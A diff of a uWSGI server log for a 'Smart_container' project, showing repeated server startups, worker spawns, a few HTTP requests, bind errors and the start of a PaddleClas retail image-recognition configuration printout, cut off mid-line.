uWSGI http 1 (pid: 10270) +*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 15 13:16:34 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x563adb6df9c0 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x563adb6df9c0 pid: 11141 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 11141) +spawned uWSGI worker 1 (pid: 11143, cores: 1) +spawned uWSGI worker 2 (pid: 11144, cores: 1) +spawned uWSGI worker 3 (pid: 11145, cores: 1) +spawned uWSGI worker 4 (pid: 11146, cores: 1) +spawned uWSGI worker 5 (pid: 11147, cores: 1) +spawned uWSGI worker 6 (pid: 11148, cores: 1) +spawned uWSGI worker 7 (pid: 11149, cores: 1) +spawned uWSGI worker 8 (pid: 11150, cores: 1) +spawned uWSGI worker 9 (pid: 11151, cores: 1) +spawned uWSGI worker 10 (pid: 11152, cores: 1) +spawned uWSGI http 1 (pid: 11153) +[pid: 11150|app: 0|req: 1/1] 210.51.42.187 () {42 vars in 752 bytes} [Mon Nov 15 05:16:54 2021] GET / => generated 179 bytes in 218 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 11150|app: 0|req: 2/2] 210.51.42.187 () {36 vars in 691 bytes} [Mon Nov 15 05:16:57 2021] GET /record/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 11150|app: 0|req: 3/3] 210.51.42.187 () {42 vars in 766 bytes} [Mon Nov 15 05:17:02 2021] GET /record/ => generated 18 bytes in 0 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 11150|app: 0|req: 4/4] 210.51.42.187 () {40 vars in 687 bytes} [Mon Nov 15 05:17:03 2021] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 19:35:08 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 current working directory: /root/Smart_container/conf/uwsgi writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid detected binary path: /usr/local/bin/uwsgi @@ -12,1134 +464,7 @@ detected binary path: /usr/local/bin/uwsgi uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x55a4c1433da0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55a4c1433da0 pid: 6332 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6332) -spawned uWSGI worker 1 (pid: 6334, cores: 1) -spawned uWSGI worker 2 (pid: 6335, cores: 1) -spawned uWSGI worker 3 (pid: 6336, cores: 1) -spawned uWSGI worker 4 (pid: 6337, cores: 1) -spawned uWSGI worker 5 (pid: 6338, cores: 1) -spawned uWSGI worker 6 (pid: 6339, cores: 1) -spawned uWSGI worker 7 (pid: 6340, cores: 1) -spawned uWSGI worker 8 (pid: 6341, cores: 1) -spawned uWSGI worker 9 (pid: 6342, cores: 1) -spawned uWSGI worker 10 (pid: 6343, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:32:26 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (127.0.0.1:8000). -bind(): Address already in use [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:32:30 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (127.0.0.1:8000). -bind(): Address already in use [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:34:49 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (127.0.0.1:8000). -bind(): Address already in use [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:36:14 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x55cee3302cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x55cee3302cd0 pid: 6717 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6717) -spawned uWSGI worker 1 (pid: 6719, cores: 1) -spawned uWSGI worker 2 (pid: 6720, cores: 1) -spawned uWSGI worker 3 (pid: 6721, cores: 1) -spawned uWSGI worker 4 (pid: 6722, cores: 1) -spawned uWSGI worker 5 (pid: 6723, cores: 1) -spawned uWSGI worker 6 (pid: 6724, cores: 1) -spawned uWSGI worker 7 (pid: 6725, cores: 1) -spawned uWSGI worker 8 (pid: 6726, cores: 1) -spawned uWSGI worker 9 (pid: 6727, cores: 1) -spawned uWSGI worker 10 (pid: 6728, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:39:11 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x564456791cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x564456791cd0 pid: 6756 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6756) -spawned uWSGI worker 1 (pid: 6758, cores: 1) -spawned uWSGI worker 2 (pid: 6759, cores: 1) -spawned uWSGI worker 3 (pid: 6760, cores: 1) -spawned uWSGI worker 4 (pid: 6761, cores: 1) -spawned uWSGI worker 5 (pid: 6762, cores: 1) -spawned uWSGI worker 6 (pid: 6763, cores: 1) -spawned uWSGI worker 7 (pid: 6764, cores: 1) -spawned uWSGI worker 8 (pid: 6765, cores: 1) -spawned uWSGI worker 9 (pid: 6766, cores: 1) -spawned uWSGI worker 10 (pid: 6767, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:40:34 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -bind(): Cannot assign requested address [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:42:55 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x558caebc7cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x558caebc7cd0 pid: 6798 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6798) -spawned uWSGI worker 1 (pid: 6800, cores: 1) -spawned uWSGI worker 2 (pid: 6801, cores: 1) -spawned uWSGI worker 3 (pid: 6802, cores: 1) -spawned uWSGI worker 4 (pid: 6803, cores: 1) -spawned uWSGI worker 5 (pid: 6804, cores: 1) -spawned uWSGI worker 6 (pid: 6805, cores: 1) -spawned uWSGI worker 7 (pid: 6806, cores: 1) -spawned uWSGI worker 8 (pid: 6807, cores: 1) -spawned uWSGI worker 9 (pid: 6808, cores: 1) -spawned uWSGI worker 10 (pid: 6809, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:46:13 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x55ebaec9ccd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55ebaec9ccd0 pid: 6835 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 6835) -spawned uWSGI worker 1 (pid: 6837, cores: 1) -spawned uWSGI worker 2 (pid: 6838, cores: 1) -spawned uWSGI worker 3 (pid: 6839, cores: 1) -spawned uWSGI worker 4 (pid: 6840, cores: 1) -spawned uWSGI worker 5 (pid: 6841, cores: 1) -spawned uWSGI worker 6 (pid: 6842, cores: 1) -spawned uWSGI worker 7 (pid: 6843, cores: 1) -spawned uWSGI worker 8 (pid: 6844, cores: 1) -spawned uWSGI worker 9 (pid: 6845, cores: 1) -spawned uWSGI worker 10 (pid: 6846, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 12:08:40 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x557f75c88cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x557f75c88cd0 pid: 15276 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 15276) -spawned uWSGI worker 1 (pid: 15279, cores: 1) -spawned uWSGI worker 2 (pid: 15280, cores: 1) -spawned uWSGI worker 3 (pid: 15281, cores: 1) -spawned uWSGI worker 4 (pid: 15282, cores: 1) -spawned uWSGI worker 5 (pid: 15283, cores: 1) -spawned uWSGI worker 6 (pid: 15284, cores: 1) -spawned uWSGI worker 7 (pid: 15285, cores: 1) -spawned uWSGI worker 8 (pid: 15286, cores: 1) -spawned uWSGI worker 9 (pid: 15287, cores: 1) -spawned uWSGI worker 10 (pid: 15288, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 12:34:18 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x5607aadfccd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x5607aadfccd0 pid: 15921 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 15921) -spawned uWSGI worker 1 (pid: 15923, cores: 1) -spawned uWSGI worker 2 (pid: 15924, cores: 1) -spawned uWSGI worker 3 (pid: 15925, cores: 1) -spawned uWSGI worker 4 (pid: 15926, cores: 1) -spawned uWSGI worker 5 (pid: 15928, cores: 1) -spawned uWSGI worker 6 (pid: 15929, cores: 1) -spawned uWSGI worker 7 (pid: 15930, cores: 1) -spawned uWSGI worker 8 (pid: 15931, cores: 1) -spawned uWSGI worker 9 (pid: 15932, cores: 1) -spawned uWSGI worker 10 (pid: 15933, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 12:53:32 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x563825142cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x563825142cd0 pid: 16496 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 16496) -spawned uWSGI worker 1 (pid: 16498, cores: 1) -spawned uWSGI worker 2 (pid: 16499, cores: 1) -spawned uWSGI worker 3 (pid: 16500, cores: 1) -spawned uWSGI worker 4 (pid: 16501, cores: 1) -spawned uWSGI worker 5 (pid: 16502, cores: 1) -spawned uWSGI worker 6 (pid: 16503, cores: 1) -spawned uWSGI worker 7 (pid: 16504, cores: 1) -spawned uWSGI worker 8 (pid: 16505, cores: 1) -spawned uWSGI worker 9 (pid: 16506, cores: 1) -spawned uWSGI worker 10 (pid: 16507, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 15:19:13 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (127.0.0.1:8000). -bind(): Address already in use [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 15:35:28 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x5590b28b4d00 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x5590b28b4d00 pid: 18275 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 18275) -spawned uWSGI worker 1 (pid: 18277, cores: 1) -spawned uWSGI worker 2 (pid: 18278, cores: 1) -spawned uWSGI worker 3 (pid: 18279, cores: 1) -spawned uWSGI worker 4 (pid: 18280, cores: 1) -spawned uWSGI worker 5 (pid: 18281, cores: 1) -spawned uWSGI worker 6 (pid: 18282, cores: 1) -spawned uWSGI worker 7 (pid: 18283, cores: 1) -spawned uWSGI worker 8 (pid: 18284, cores: 1) -spawned uWSGI worker 9 (pid: 18285, cores: 1) -spawned uWSGI worker 10 (pid: 18286, cores: 1) -2021-11-02 07:45:22 INFO: -=========================================================== -== PaddleClas is powered by PaddlePaddle ! == -=========================================================== -== == -== For more info please go to the following website. == -== == -== https://github.com/PaddlePaddle/PaddleClas == -=========================================================== - -2021-11-02 07:45:22 INFO: Global : -2021-11-02 07:45:23 INFO: batch_size : 32 -2021-11-02 07:45:23 INFO: cpu_num_threads : 10 -2021-11-02 07:45:23 INFO: enable_benchmark : True -2021-11-02 07:45:23 INFO: enable_mkldnn : True -2021-11-02 07:45:23 INFO: enable_profile : False -2021-11-02 07:45:23 INFO: gpu_mem : 8000 -2021-11-02 07:45:23 INFO: ir_optim : True -2021-11-02 07:45:23 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-02 07:45:23 INFO: use_fp16 : False -2021-11-02 07:45:23 INFO: use_gpu : True -2021-11-02 07:45:23 INFO: use_tensorrt : False -2021-11-02 07:45:23 INFO: IndexProcess : -2021-11-02 07:45:23 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt -2021-11-02 07:45:23 INFO: delimiter : -2021-11-02 07:45:23 INFO: dist_type : IP -2021-11-02 07:45:23 INFO: embedding_size : 512 -2021-11-02 07:45:23 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail -2021-11-02 07:45:23 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-02 07:45:23 INFO: index_method : HNSW32 -2021-11-02 07:45:23 INFO: index_operation : new -2021-11-02 07:45:23 INFO: RecPostProcess : None -2021-11-02 07:45:23 INFO: RecPreProcess : -2021-11-02 07:45:23 INFO: transform_ops : -2021-11-02 07:45:23 INFO: ResizeImage : -2021-11-02 07:45:23 INFO: size : 224 -2021-11-02 07:45:23 INFO: NormalizeImage : -2021-11-02 07:45:23 INFO: mean : [0.485, 0.456, 0.406] -2021-11-02 07:45:23 INFO: order : -2021-11-02 07:45:23 INFO: scale : 0.00392157 -2021-11-02 07:45:23 INFO: std : [0.229, 0.224, 0.225] -2021-11-02 